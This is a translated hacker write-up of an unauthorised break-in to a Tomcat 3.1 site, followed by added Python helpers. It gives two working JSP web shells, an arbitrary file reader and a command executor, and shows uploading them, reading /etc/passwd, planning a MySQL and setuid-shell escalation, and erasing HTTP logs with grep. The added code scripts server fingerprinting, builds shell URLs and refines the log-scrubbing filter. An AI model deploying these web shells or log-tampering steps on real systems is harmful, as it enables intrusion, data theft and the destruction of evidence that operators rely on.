Author: lovehacker
This article describes how root on a FreeBSD 4.0 machine was obtained through a web intrusion.
This article is written for educational purposes only. I hope you will not use the methods and procedures described here to endanger network security.
Contact: lovehacker@263.net
Address: http://www.chinansl.com
Copyright belongs to the League Information Technology Limited Liability Company. Reprinting is permitted, but the article must be reproduced in full.
By chance I came across a website with fresh, pleasant pages. The site was developed in JSP, and out of personal interest I decided to check how secure the system was.
telnet www.target.com 8080
GET /chinansl HTTP/1.1
[Enter]
[Enter]
The response came back as follows:
HTTP/1.0 404 Not Found
Date: Sun, 08 Jul 2001 07:49:13 GMT
Servlet-Engine: Tomcat Web Server/3.1 (JSP 1.1; Servlet 2.2; Java 1.2.2; Linux 2.2.12 i386; java.vendor=Blackdown Java-Linux Team)
Content-Language: en
Content-Type: text/html
Status: 404
<H1>Error: 404</H1><H2>Location: /chinansl</H2>File not found<br>/chinansl
That gave me the name and version of the web server: "Tomcat 3.1". I remembered having found a vulnerability in this version myself and posting it to Bugtraq.
Roughly: you can escape the web root using "..", so I tried the following, none of which worked:
http://target:8080/.../../%00.jsp (NO)
http://target:8080/file/index.jsp (NO)
http://target:8080/index.jsp (NO)
http://target:8080/index.jsp%81 (NO)
http://target:8080/index.js%70 (NO)
http://target:8080/index.jsp%2581 (NO)
http://target:8080/WEB-INF/ (NO)
Well, let's try something else. Tomcat 3.1 ships with an administration tool that lets you list the directories and files of each web context and add new contexts. Try http://target:8080/admin/
The administrator had neither removed this directory nor restricted access to it :-( Error!!!!!
I then clicked the "View All Contexts" button, which listed the names of files and directories under the web root. After reading through them carefully for a while I found a file-upload component. Heh heh, time to write a JSP file and take a look.
I wrote this one in the time it takes to drink a few cups of coffee:
<%@ page import="java.io.*" %>
<%
    // Read the file named by the ?file= parameter and echo it line by line.
    // This is the deliberately unrestricted reader used in the intrusion.
    String file = request.getParameter("file");
    String str = "";
    FileInputStream fis = null;
    DataInputStream dis = null;
    try {
        fis = new FileInputStream(file);
        dis = new DataInputStream(fis);
        while (true) {
            try {
                str = dis.readLine();   // deprecated, but available on Java 1.2.2
            } catch (Exception e) {
                str = null;             // treat a read error as end of file rather than looping forever
            }
            if (str == null) break;
            out.print(str + "<br>");
        }
    } catch (IOException e) {
    } finally {
        if (fis != null) try { fis.close(); } catch (IOException e) {}
    }
%>
I uploaded this JSP into the other side's web directory through the upload component, and then:
http://target:8080/upload/test.jsp?file=/etc/passwd
Heh, the password file came out. I only read /etc/passwd and did not try /etc/shadow, because at the time web servers were generally started as nobody. (A mistake.)
What followed was a tedious round of password guessing, which failed. Forget it. Now I have a shell: if I can't guess the password, I'll just make IE my shell environment!
I wrote another one:
<%@ page import="java.io.*" %>
<%
    // Run the command given in the ?cmd= parameter and return its stdout.
    // Note: exec(String) tokenises on whitespace and does not start a shell,
    // so pipes and redirections in cmd are passed to the program as plain arguments.
    try {
        String cmd = request.getParameter("cmd");
        Process child = Runtime.getRuntime().exec(cmd);
        InputStream in = child.getInputStream();
        int c;
        while ((c = in.read()) != -1) {
            out.print((char) c);
        }
        in.close();
        try {
            child.waitFor();
        } catch (InterruptedException e) {
            e.printStackTrace();
        }
    } catch (IOException e) {
        System.err.println(e);
    }
%>
I uploaded this JSP through the upload component as well. Heh, now I really have a shell.
http://target:8080/upload/cmd.jsp?cmd=ls+-la+/
(output not listed here)
How to get root? After some looking around I found that MySQL was installed on the system, and I got the MySQL password out of the JSP source code :) Let's see which user MySQL runs as:
http://target:8080/upload/cmd.jsp?cmd=ps+aux+|+grep+mysqld
Display:
root 87494 0.2 1.9 17300 4800 p0- S 28Jun01 .72 /usr/local/data/MySQL
Heh, there is a way. The system runs MySQL as root and I know the MySQL password. So I could write a small program, create a table, put my data into the table, and then use "SELECT ... INTO OUTFILE" to write a file onto the system, placed so that my program gets run when the administrator executes su. (Remember the apache.org intrusion? The intruders used this very method.)
Then I would upload something like a bindshell, run it, and get a nobody-level shell; after that I would use the setuid shell created when root ran su to become root.
Heh, a fine plan. I was rather proud of my idea......
What happened next nearly made me cough up blood:
I typed: http://target:8080/upload/cmd.jsp?cmd=id
Display:
uid=0(root) gid=0(xxx) groups=0(xxx),2(xxx),3(xxx),4(xxx),5(xxx),20(xxx),31(xxx)
Damn: my web shell was already root. Hats off to the administrator, and to me, for all the time I had just spent. Ah!
http://target:8080/upload/cmd.jsp?cmd=ps+aux
The web server itself was running as root (output not listed).
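The fingerprinting at the top of this write-up (reading the Servlet-Engine header from the raw 404) and the id/ps checks just above are easy to script. The following Python is an added example, not code from the original article; the host, port and the /upload/cmd.jsp path are assumptions, and the HTTP response, id line and ps listing embedded below are constructed samples modelled on the ones shown, not data from the target.

```python
# Added example (not from the original article): helpers for the recon and
# post-exploitation checks walked through above. Host/port/paths are assumptions;
# the HTTP response, id output and ps listing below are constructed samples.
import re
import socket
from urllib.parse import quote_plus


def raw_http_get(host, port, path, timeout=5.0):
    """Send the same bare GET the article types into telnet and return the raw reply."""
    request = f"GET {path} HTTP/1.1\r\n\r\n".encode()
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(request)
        chunks = []
        while True:
            data = s.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks)


def parse_servlet_engine(response):
    """Extract product, version and the parenthesised details from a Tomcat 3.x
    Servlet-Engine header. Returns None when the header is absent or unparseable."""
    head = response.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    for line in head.split("\r\n")[1:]:          # skip the status line
        name, _, value = line.partition(":")
        if name.strip().lower() != "servlet-engine":
            continue
        m = re.match(r"\s*(?P<product>[^/]+)/(?P<version>[\d.]+)\s*(?:\((?P<details>.*)\))?", value)
        if not m:
            return None
        details = [d.strip() for d in (m["details"] or "").split(";") if d.strip()]
        return {"product": m["product"].strip(), "version": m["version"], "details": details}
    return None


def is_tomcat_31(info):
    """True for the Tomcat 3.1 banner that made the /admin check worth trying."""
    return (info is not None
            and info["product"].lower().startswith("tomcat")
            and info["version"].startswith("3.1"))


def webshell_url(base, cmd, page="/upload/cmd.jsp"):
    """URL for the uploaded cmd.jsp. quote_plus turns spaces into '+' (as in the
    article's ls+-la+/) and escapes characters such as '|' that would otherwise
    be mangled in the query string; '/' is left alone since it is harmless there."""
    return f"{base}{page}?cmd={quote_plus(cmd, safe='/')}"


ID_RE = re.compile(r"uid=(\d+)\((\w+)\)")


def effective_uid(id_output):
    """(uid, name) parsed from the output of id, or None if it does not look like id."""
    m = ID_RE.search(id_output)
    return (int(m.group(1)), m.group(2)) if m else None


def process_owners(ps_output, name):
    """Users running any process whose command column contains `name`, from ps aux text
    (USER is the first column, COMMAND the eleventh, on both BSD and Linux)."""
    owners = set()
    for line in ps_output.splitlines()[1:]:      # skip the header row
        fields = line.split(None, 10)
        if len(fields) == 11 and name in fields[10] and "grep" not in fields[10]:
            owners.add(fields[0])
    return owners


# Constructed samples modelled on the article's output; not captured from any host.
SAMPLE_RESPONSE = (
    b"HTTP/1.0 404 Not Found\r\n"
    b"Date: Sun, 08 Jul 2001 07:49:13 GMT\r\n"
    b"Servlet-Engine: Tomcat Web Server/3.1 (JSP 1.1; Servlet 2.2; Java 1.2.2; "
    b"Linux 2.2.12 i386; java.vendor=Blackdown Java-Linux Team)\r\n"
    b"Content-Type: text/html\r\n"
    b"Status: 404\r\n"
    b"\r\n"
    b"<H1>Error: 404</H1>\r\n"
)
SAMPLE_ID = "uid=0(root) gid=0(wheel) groups=0(wheel),2(kmem),3(sys)"
SAMPLE_PS = (
    "USER   PID %CPU %MEM  VSZ  RSS TT  STAT STARTED    TIME COMMAND\n"
    "root     1  0.0  0.1  552  232 ??  Ss   28Jun01 0:00.10 /sbin/init\n"
    "root 87494  0.2  1.9 17300 4800 p0- S    28Jun01 0:00.72 /usr/local/data/mysql\n"
    "nobody 1234 0.0  3.0 20000 7000 ??  S    28Jun01 0:05.00 java ... tomcat\n"
)

if __name__ == "__main__":
    info = parse_servlet_engine(SAMPLE_RESPONSE)
    print(info, "tomcat 3.1:", is_tomcat_31(info))
    print(webshell_url("http://target:8080", "ps aux | grep mysqld"))
    print("web shell uid:", effective_uid(SAMPLE_ID))
    print("mysql runs as:", process_owners(SAMPLE_PS, "mysql"))
```

Against a live host you would feed `raw_http_get("target", 8080, "/chinansl")` into `parse_servlet_engine`; the shell URL helper makes the point that the pipe in the article's `ps aux | grep mysqld` line has to be URL-encoded, and that even then cmd.jsp's `exec(String)` hands `|` to ps as an argument unless the command is wrapped in `/bin/sh -c`.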
What remained:
1. Delete my telnet records.
2. Delete the HTTP logs.
To clean the logs I used cat xxx | grep -v "ip" > temp and then overwrote the log files with the filtered copy.
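What the grep -v "ip" step above actually removes is worth seeing, since grep treats its argument as a regular expression and matches it anywhere in the line, not just in the client field. The following Python is an added example, not part of the original article; the access-log lines are constructed samples and 10.1.1.2 is an assumed intruder address.

```python
# Added example (not from the original article): what `grep -v "ip"` removes from an
# access log, next to a filter that only looks at the client field. Log lines are
# constructed samples; 10.1.1.2 is an assumed intruder address.
import re

SAMPLE_LOG = """\
10.1.1.2 - - [08/Jul/2001:07:49:13 +0000] "GET /chinansl HTTP/1.1" 404 71
10.1.1.25 - - [08/Jul/2001:07:50:02 +0000] "GET /index.jsp HTTP/1.0" 200 3120
192.168.5.7 - - [08/Jul/2001:07:51:40 +0000] "GET /admin/ HTTP/1.0" 200 1450
10.1.1.2 - - [08/Jul/2001:07:52:11 +0000] "GET /upload/cmd.jsp?cmd=id HTTP/1.0" 200 88
172.16.0.9 - - [08/Jul/2001:07:53:00 +0000] "GET /go?u=http://10.1.1.2/ HTTP/1.0" 302 0
"""


def grep_v(lines, pattern):
    """Equivalent of `grep -v "pattern"`: a regex, searched anywhere in the line,
    where each '.' in a dotted address matches any character."""
    rx = re.compile(pattern)
    return [line for line in lines if not rx.search(line)]


def drop_client(lines, ip):
    """Remove only entries whose first (client address) field is exactly `ip`."""
    return [line for line in lines if line.split(" ", 1)[0] != ip]


def filtered_log(text, ip):
    """The text that would be written back over the log by the field-exact filter."""
    kept = drop_client(text.splitlines(), ip)
    return "\n".join(kept) + ("\n" if kept else "")


if __name__ == "__main__":
    lines = SAMPLE_LOG.splitlines()
    print("grep -v keeps:", len(grep_v(lines, "10.1.1.2")), "of", len(lines))
    print("field-exact keeps:", len(drop_client(lines, "10.1.1.2")), "of", len(lines))
```

On the sample, the grep form also throws away the 10.1.1.25 client's request and another client's request whose URL merely mentions 10.1.1.2, so unrelated traffic disappears along with the intruder's; a reviewer comparing the log against the other clients' own records would notice those gaps.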
I didn't deface his page, because I'm not a hacker (or a cracker), just a network security enthusiast. So I sent an email to the system administrator!
And of course, by the way, I mentioned in the letter that we would be very happy to provide him with security services if needed!